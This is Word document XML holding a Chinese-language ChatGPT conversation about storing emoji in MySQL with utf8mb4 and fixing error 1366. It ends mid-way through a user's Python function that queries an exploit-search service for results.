    <w:p w14:paraId="31FF2822" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B37AA4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，在修改字符集之前，你应该备份你的数据库，以防止数据丢失。此外，修改字符集可能会影响到数据库的性能和存储需求，你需要做好相关的评估。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474BAB3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2B25B0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建表的时候如何让所有字段都可以存这种字符？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B51C7C6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69D3EA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F3A1CE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在创建表的时候，你可以指定表的默认字符集为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样所有新创建的字符字段都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将使用这个字符集，可以存储任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，包括四字节的字符（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Emoji</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9347F4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733C5FF6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A582D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F55A145" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2318B5B3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CREATE TABLE my_table (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF6182" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C64A9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    text_column VARCHAR(255),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE7638" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    another_text_column TEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA1F7A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0026830F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607E93F7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CREATE TABLE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句创建了一个新表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> my_table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并指定了表的默认字符集为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和默认排序规则为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4_unicode_ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">text_column </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> another_text_column </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段都将使用这个字符集和排序规则，可以存储任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF4970" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B14CB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集可以存储任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，但是它使用的空间更多，可能会影响到数据库的性能和存储需求。在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前，你需要做好相关的评估。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD7F7A6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A444A82" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我已经这么做了，但是依然报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1366, "Incorrect string value: '\\xF0\\x9F\\x92\\xA3\\xF0\\x9F...' for column 'source' at row 1")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。是不是程序本身报错了？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB47B3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A7C23" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E929F3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你已经将数据库、表或列的字符集更改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但仍然遇到错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(1366, "Incorrect string value: '\xF0\x9F\x92\xA3\xF0\x9F...' for column 'source' at row 1")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么问题可能出在另外的地方。这里有一些可能的原因：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB23F2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9EDE7F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接的字符集：虽然数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列的字符集是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是如果连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的客户端（可能是你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序）使用的字符集不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么仍然可能出现这个错误。你可以检查你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序中用于连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码，确保使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集。例如，如果你使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql-connector-python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动程序，你可以这样创建连接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA70F8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5CDB32" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451E5CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cnx = mysql.connector.connect(user='user', password='password', host='localhost', database='database', charset='utf8mb4')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9E51B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C070B69" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列的排序规则（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>collation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">utf8mb4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符集应该使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4_unicode_ci </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4_general_ci </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的排序规则。如果你使用的排序规则不支持四字节的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，那么可能会出现这个错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D835F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B5D79C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库服务器的配置：如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> character_set_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> collation_server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置项设置的不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么可能会出现这个错误。你可以查看这些配置项的值，如果它们不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器的配置文件（通常是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> my.cnf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> my.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），将这些配置项的值更改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101D5E81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BF44BE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请检查以上几个可能的原因，看看能否解决你的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD0A9C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4CD77E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async def querySploitus(url, data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3C7ED" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global STOP_FLAG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549B00F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> res_list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3E4BA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res_list = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259A6CAB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30479F55" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        response = await client.post(url=url, json=data, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B85718" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res_json = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F21E0B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exps = res_json["exploits"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B775C2B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if len(exps)&lt;10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D17C518" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            STOP_FLAG = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F12413" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            log_debug.info("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本页匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不足</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>STOP_FLAG = True")</w:t>
      </w:r>
    </w:p>
